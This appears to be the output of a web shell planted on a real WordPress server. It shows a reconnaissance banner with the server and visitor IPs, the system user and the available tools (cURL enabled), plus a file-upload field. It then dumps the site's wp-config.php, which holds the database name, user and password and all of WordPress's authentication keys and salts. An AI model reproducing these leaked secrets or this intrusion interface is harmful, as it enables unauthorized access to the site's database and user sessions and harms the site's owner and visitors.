| Server IP : 80.65.96.118 / Your IP : 216.73.216.247 Web Server : Apache System : Linux vserver08.previder.nl 5.14.0-687.26.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 14 16:32:02 EDT 2026 x86_64 User : prinse0000 ( 10013) PHP Version : 8.3.32 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/cso-deprinsenhof.nl/httpdocs/ |
Upload File : |
<?php
define('WP_CACHE', true);
define( 'WPCACHEHOME', '/var/www/vhosts/cso-deprinsenhof.nl/httpdocs/wp-content/plugins/wp-super-cache/' );
define('WP_AUTO_UPDATE_CORE', 'minor');// Deze instelling is vereist om mogelijk te maken dat WordPress-updates op de juiste manier worden beheerd in WordPress Toolkit. Verwijder deze regel als deze WordPress-website niet langer door WordPress Toolkit wordt beheerd.
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_upz4o' );
/** MySQL database username */
define( 'DB_USER', 'wp_8mdev' );
/** MySQL database password */
define( 'DB_PASSWORD', 'VW8uLt4s6#' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost:3306' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 's|6oTq3a7Uf;;:*2LaF6bSI0Rr5|Utn*6rVFac6r_|K9)rcM0rV:!JrDR!oHiKP#');
define('SECURE_AUTH_KEY', '55BQ&-5*0ao+KkKp4o@33FLI62Ohw(27yzf@7oy4B7V5ku7]k2t9_&jhCk;_38G|');
define('LOGGED_IN_KEY', 'V7X+g+-;3tecP/;#i04(bHgnWi-JPH;kSE#n[3)zI7bfa7mWao@dBKD9e@f_7![G');
define('NONCE_KEY', 'mh(!*6Z75Tzg62dU(zn9_lWMT09x5_a]f3O5@30%y0CD_H127k:Wk~x!Vs+#Jd[7');
define('AUTH_SALT', 'B-4AlsK!|7tW3%4OIo678&5hlx2os)&3@IoBp!&bQSj-4lH5y]3QsOg8b2p%tI*@');
define('SECURE_AUTH_SALT', 'w1~ZaT-Lb2507vg22hv_3:0+&]2RO4z4x~yX~V4*6:7vSsrR|65S:Nqsgph*K)@*');
define('LOGGED_IN_SALT', '/h2i3fU]w6T&D7g0]mAbV9Xq*UefK8##Rz31D9Wo0bz_0WAq#&@btUuX6(95eUDJ');
define('NONCE_SALT', 'bkPP3*s+ErXdH42/8P7&vT)5/419E7Ai:[[XT[839x3:-eqG9u!0xl#Rm2s[@gB6');
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'Eq4IuQSt_';
define('WP_ALLOW_MULTISITE', true);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) )
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';